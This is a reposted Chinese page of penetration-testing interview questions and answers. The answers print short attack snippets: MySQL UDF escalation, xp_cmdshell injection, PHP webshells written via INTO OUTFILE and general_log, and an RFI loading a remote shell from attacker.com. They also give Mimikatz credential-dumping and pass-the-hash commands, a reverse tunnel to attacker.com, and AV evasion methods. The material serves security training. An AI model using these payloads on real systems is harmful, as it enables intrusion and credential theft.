2025年滲透測試面試題總結-2025年HW(護網面試) 47(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?2025年HW(護網面試) 47

1. UDF提權

2. 命令執行與代碼執行的區別

3. 文件包含利用姿勢

4. 漏洞復現流程

5. SQL Server注入相關

6. 預編譯如何繞過SQL注入

7. 內網正向代理與反向代理

8. Mimikatz使用

9. 目標出不了內網的解決方案

10. 繞過disable_function方法

11. MySQL寫Shell方法

12. Redis漏洞利用

13. SQLMap os-shell寫入文件

14. 最近研究方向

15. 免殺技術(Bypass AV/EDR)

16. Java反序列化漏洞

?2025年HW(護網面試) 47

1、udf提權
2、命令執行與代碼執行的區別
3、文件包含利用姿勢
4、漏洞復現
5、sqlserver的注入相關
6、預編譯怎么進行sql注入
7、內網的正向代理和反向代理
8、mimikatz的使用
9、目標出不了內網咋辦
10、如何繞過disable_function
11、mysql進行寫shell的方法
12、redis的漏洞利用相關
13、sqlmap的os-shell寫了哪些文件
14、最近在研究啥
15、免殺
16、java的相關的反系列化

1. UDF提權

  • 原理:利用MySQL自定義函數(UDF)加載惡意共享庫(.so/.dll),執行系統命令。
  • 步驟
    1. 上傳編譯好的UDF庫(如lib_mysqludf_sys.so )到插件目錄。
    2. 創建UDF函數:CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so';
    3. 執行命令:SELECT sys_exec('id');
  • 條件
    • MySQL有FILE權限且secure_file_priv為空。
    • 知曉服務器絕對路徑。
  • 防御:限制FILE權限,設置secure_file_priv,禁用動態庫加載。

2. 命令執行與代碼執行的區別

類型命令執行(RCE)代碼執行
執行環境直接調用操作系統命令(如/bin/sh在編程語言解釋器中執行代碼(如PHP的eval()
危害范圍影響整個系統受限于語言環境(如PHP沙盒)
示例函數system(), exec()eval(), assert()

3. 文件包含利用姿勢

  1. 本地文件包含(LFI)
    • 讀取敏感文件:/etc/passwd、配置文件。
    • 結合日志注入:包含Apache日志寫入PHP代碼。
  2. 遠程文件包含(RFI)
    • 加載遠程惡意腳本:http://attacker.com/shell.txt
  3. 協議利用
    • php://filter讀取源碼:php://filter/convert.base64-encode/resource=index.php
  4. 無回顯利用
    • 觸發錯誤日志或延時判斷(盲注)。

4. 漏洞復現流程

  1. 環境搭建:使用Docker/Vulhub快速部署漏洞環境。
  2. 漏洞驗證
    • 手工測試:構造Payload觸發漏洞(如SQLi、XSS)。
    • 工具輔助:Burp Suite、SQLMap。
  3. 利用鏈構造:結合多個漏洞實現RCE(如LFI+日志注入)。
  4. 結果驗證:獲取Shell/敏感數據,記錄復現步驟。

5. SQL Server注入相關

  • 堆疊查詢'; EXEC xp_cmdshell 'whoami'--(需開啟xp_cmdshell)。
  • 差異備份寫Shell:利用備份功能寫入ASPX木馬。
  • 盲注函數WAITFOR DELAY '0:0:5'CHAR()
  • 權限提升EXEC sp_addsrvrolemember 'user', 'sysadmin'

6. 預編譯如何繞過SQL注入

  • 預編譯原理:SQL語句與參數分離,避免拼接。
  • 繞過場景
    1. 二次注入:參數入庫后被其他功能拼接使用。
    2. 非參數化部分:如ORDER BY后接動態字段名。
    3. 存儲過程動態SQL:內部使用EXEC()執行拼接語句。

7. 內網正向代理與反向代理

類型正向代理反向代理
角色客戶端主動連接代理訪問目標服務端通過代理接收外部請求
滲透應用內網穿透(如SSH -L端口轉發)隱藏內網服務(Nginx反向代理)
工具frp、ProxychainsNgrok、Cobalt Strike

8. Mimikatz使用

  • 常用命令
    1. 抓取明文密碼:sekurlsa::logonpasswords
    2. 導出Kerberos票據:kerberos::list /export
    3. PTH攻擊:sekurlsa::pth /user:admin /domain:test /ntlm:xxxx
  • 繞過防御
    • 使用內存加載(無文件執行)。
    • 禁用LSASS保護檢測(需管理員權限)。

9. 目標出不了內網的解決方案

  1. DNS隧道:使用dnscat2傳輸數據。
  2. ICMP隧道:icmpsh或PingTunnel。
  3. 端口轉發
    • 正向代理:ssh -L 8080:內網IP:80 user@跳板機
    • 反向代理:plink -R 4444:localhost:80 attacker.com
  4. Web通道:利用HTTP長連接傳輸數據(如ReGeorg)。

10. 繞過disable_function方法

  1. LD_PRELOAD劫持:通過惡意so文件劫持函數調用。
  2. ImageMagick漏洞:利用CVE-2016-3714執行命令。
  3. FFI擴展:PHP 7.4+的FFI接口直接調用系統函數。
  4. COM組件(Windows)new COM("WScript.Shell")執行命令。

11. MySQL寫Shell方法

  1. INTO OUTFILE
    sqlSELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/shell.php'; 
  2. 日志文件寫入
    sqlSET global general_log_file='/var/www/shell.php'; SET global general_log=on; SELECT '<?php eval($_POST[cmd]); ?>'; 

12. Redis漏洞利用

  1. 未授權訪問:直接執行CONFIG SET dir /var/www寫入SSH密鑰或Webshell。
  2. 主從復制RCE:偽造惡意主節點,同步加載惡意模塊。
  3. Lua沙盒繞過:CVE-2022-0543執行系統命令。

13. SQLMap os-shell寫入文件

  • MySQL:寫入UDF庫(如/usr/lib/mysql/plugin/udf.so )和臨時Webshell。
  • MSSQL:通過xp_cmdshell生成Bat腳本或VBS腳本。
  • Oracle:利用DBMS_ADVISOR寫入Java類文件。

14. 最近研究方向

  • AI模型安全:對抗樣本攻擊、模型逆向工程。
  • 云原生滲透:Kubernetes逃逸、Serverless函數漏洞。
  • 硬件安全:物聯網設備固件分析、旁路攻擊(如功耗分析)。

15. 免殺技術(Bypass AV/EDR)

  1. 靜態免殺
    • 加密Shellcode(AES/XOR)。
    • 代碼混淆(如Polymorphic代碼)。
  2. 動態免殺
    • 內存加載(無文件執行)。
    • API調用混淆(如直接系統調用)。
  3. 工具:Cobalt Strike Artifact Kit、Shellter。

16. Java反序列化漏洞

  • 利用鏈
    1. Commons CollectionsInvokerTransformer鏈觸發RCE。
    2. Fastjson:JNDI注入(如CVE-2021-45046)。
    3. JDK原生鏈AnnotationInvocationHandler
  • 防御:升級依賴庫,啟用反序列化過濾器(JEP 290)。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/89057.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/89057.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/89057.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

iPhone 數據擦除軟件評測(最新且全面)

當您準備出售、捐贈或回收 iPhone 時&#xff0c;僅僅恢復出廠設置并不足以保證您的個人數據徹底消失。專業的 iPhone 數據擦除軟件采用先進的技術&#xff0c;確保您的敏感信息永久無法恢復。本文回顧了十種流行的 iPhone 數據擦除工具&#xff0c;詳細介紹了它們的功能、優點…

Qt 將觸摸事件轉換為鼠標事件(Qt4和Qt5及以上版本)

在Qt中&#xff0c;觸摸事件&#xff08;QTouchEvent&#xff09;和鼠標事件&#xff08;QMouseEvent&#xff09;是兩種不同的輸入事件類型。通常情況下&#xff0c;觸摸事件不會自動轉換為鼠標事件&#xff0c;因為它們代表的是不同的輸入設備&#xff08;觸摸屏 vs 鼠標&…

Blender 云渲染高效流程:渲染 101 集群加速實戰?

一、核心優勢&#xff1a;適配 Blender 全場景需求? ? 全渲染器深度兼容? Cycles&#xff08;CPU/GPU 模式&#xff09;&#xff1a;云端 4090 顯卡渲染速度比本地快 12 倍&#xff0c;支持 8K 分辨率 16K 紋理無壓力? Eevee 實時渲染&#xff1a;集群同步輸出預覽動畫&am…

SQL學習記錄01

什么是SQL&#xff1f; Structured Query Language &#xff08;結構化查詢語言&#xff09;&#xff0c;與關系型數據庫進行通信的標準語言。什么是數據庫&#xff1f;“按照數據結構來組織、存儲、和管理數據的倉庫。”一個長期存儲在計算機內的、有組織的、可共享的、統一管…

醫療項目如何應對法規變更?

醫療項目應對法規變更的關鍵策略包括建立法規監測體系、及時內部培訓和溝通、調整業務流程和合規標準、技術系統快速迭代升級。 其中&#xff0c;建立有效的法規監測體系尤其重要。這意味著企業需要實時關注監管機構發布的政策更新和公告&#xff0c;迅速理解法規變化內容及對自…

AI Top10

AI 前十排名排名團隊/機構名稱國家核心優勢領域1DeepMind英國強化學習、Alpha系列模型2OpenAI美國GPT系列、多模態大模型3DeepSeek中國高效NLP模型、開源生態建設4Google Brain美國Transformer架構、TensorFlow框架5Meta AI (FAIR)美國計算機視覺、Llama系列模型6NVIDIA Resear…

LabVIEW通知器函數應用

介紹LabVIEW通知器&#xff08;Notifier&#xff09;函數&#xff0c;演示兩類并行循環通信場景&#xff1a;單對循環數據交互、多循環通知聚合&#xff0c;含程序框圖&#xff08;數據發送 / 接收、多循環通知&#xff09;與前面板&#xff08;數據顯示&#xff09;。功能說明…

推薦《Python 編程:從入門到實踐》之Python編程的基礎知識

在 Python 學習資源琳瑯滿目的當下&#xff0c;《Python 編程&#xff1a;從入門到實踐》脫穎而出&#xff0c;堪稱 Python 入門的不二之選。本書由經驗豐富的教育工作者撰寫&#xff0c;以清晰易懂的語言和循序漸進的方式&#xff0c;引領讀者從 Python 的基礎語法逐步邁向實際…

Kafka入門和基礎配置

目錄Kafka入門消息引擎系統ABC快速搞定Kafka術語kafka三層消息架構名詞術語Kafka基礎Kafka部署參考重要配置參數Broker端參數Topic級別參數JVM參數Kafka是消息引擎系統&#xff0c;也是分布式流處理平臺Kafka入門 消息引擎系統ABC 民間版&#xff1a;系統 A 發送消息給消息引…

OPENPPP2 VEthernet 網絡協議堆棧(CTCP)VNetStack 深度技術解析

&#x1f310; OPENPPP2 VEthernet 網絡協議堆棧&#xff08;CTCP&#xff09;VNetStack 深度技術解析&#x1f3d7;? 一、系統架構全景圖 #mermaid-svg-FdlbKZCGQDDbvOL6 {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermai…

Gartner發布2025年中國網絡安全成熟度曲線:網絡安全的重點正轉向保護AI、推動業務轉型和增強組織韌性

網絡安全的重點正轉向保護人工智能、推動業務轉型和增強組織韌性。首席信息官及其安全和風險管理主管可以利用這份技術成熟度曲線來識別實用且高價值的技術和實踐&#xff0c;從而保持安全和敏捷。 戰略規劃假設 到2027年&#xff0c;60%的中國大型組織將在安全運營中心&#x…

網絡準入控制系統的作用解析,2025年保障企業入網安全第一道防線

在當今數字化時代&#xff0c;網絡已成為企業運營的基礎&#xff0c;隨著網絡的廣泛應用&#xff0c;網絡準入控制系統作為保障網絡安全的重要手段&#xff0c;正發揮著至關重要的作用。保障網絡安全網絡準入控制系統如同網絡的忠誠衛士&#xff0c;它為網絡大門安裝了智能鎖&a…

java基礎(day09)

目錄 1.繼承的作用 2.繼承樹 3.protected和super protected super 注&#xff1a;super/this()--構造方法&#xff0c;第一行&#xff0c;一般不同時出現 4.向上向下轉型 向上轉型 向下轉型 final 小結 1.繼承的作用 理解&#xff1a;首先就是可以實現代碼復用&#x…

如何進行選擇。

初始理解問題 首先&#xff0c;我們需要明確題目在問什么。題目“House Robber”描述的是一個強盜在一排房屋前&#xff0c;每個房屋都有一定數量的錢。強盜不能連續搶劫兩個相鄰的房屋&#xff0c;否則會觸發警報。目標是搶劫到最多的錢。 動態規劃的思路 這個問題可以使用動態…

PHP語法高級篇(三):Cookie與會話

Cookie與會話在 Web 編程中十分實用&#xff1a;Cookie 能實現一周免登錄&#xff0c;還能記住用戶的主題偏好&#xff1b;會話可保存當前用戶信息&#xff0c;也能臨時存儲購物車數據。本篇文章將記錄Cookie與會話的學習過程。 一、Cookie cookie 常用于識別用戶。cookie 是服…

11. JVM中的分代回收

1. JVM介紹和運行流程-CSDN博客 2. 什么是程序計數器-CSDN博客 3. java 堆和 JVM 內存結構-CSDN博客 4. 虛擬機棧-CSDN博客 5. JVM 的方法區-CSDN博客 6. JVM直接內存-CSDN博客 7. JVM類加載器與雙親委派模型-CSDN博客 8. JVM類裝載的執行過程-CSDN博客 9. JVM垃圾回收…

基于PaddleOCR的營業執照識別與數據分析系統

基于PaddleOCR的營業執照識別與數據分析系統 1. 項目概述 本項目旨在利用百度PaddleOCR技術識別營業執照圖片中的關鍵信息,結合自然語言處理(NLP)和卷積神經網絡(CNN)對OCR結果進行分類處理,最后對識別出的收入流水數據進行深度分析與可視化展示。系統將實現從圖像識別到數…

SpringBoot JSON字典序列化翻譯

&#x1f9e9; 一、效果預期 Data public class UserVO {private String status;DictTranslate(type "user_status")private String statusName; }最終返回 JSON&#xff1a; {"status": "1","statusName": "啟用" }&#…

基于Java+Maven+Testng+Selenium+Log4j+Allure+Jenkins搭建一個WebUI自動化框架(5)失敗用例截圖與重試

在UI自動化測試用例執行過程中&#xff0c;經常會有很多不確定的因素導致用例執行失敗&#xff0c;比如網絡原因、環境問題等&#xff0c;所以我們有必要引入重試機制&#xff08;失敗重跑&#xff09;&#xff0c;來提高測試用例執行穩定性。準備工作&#xff1a;我們在進行失…

【Oracle】centos7靜默安裝oracle19c

靜默安裝三步驟&#xff1a; 1、數據庫安裝db_install.rsp&#xff08;數據庫軟件安裝響應文件&#xff09;2、配置監聽netca.rap&#xff08;監聽配置響應文件&#xff09;3、建庫dbca.rsp&#xff08;建庫響應文件&#xff09;安裝oracle19c先決條件準備&#xff1a; 1.檢查主…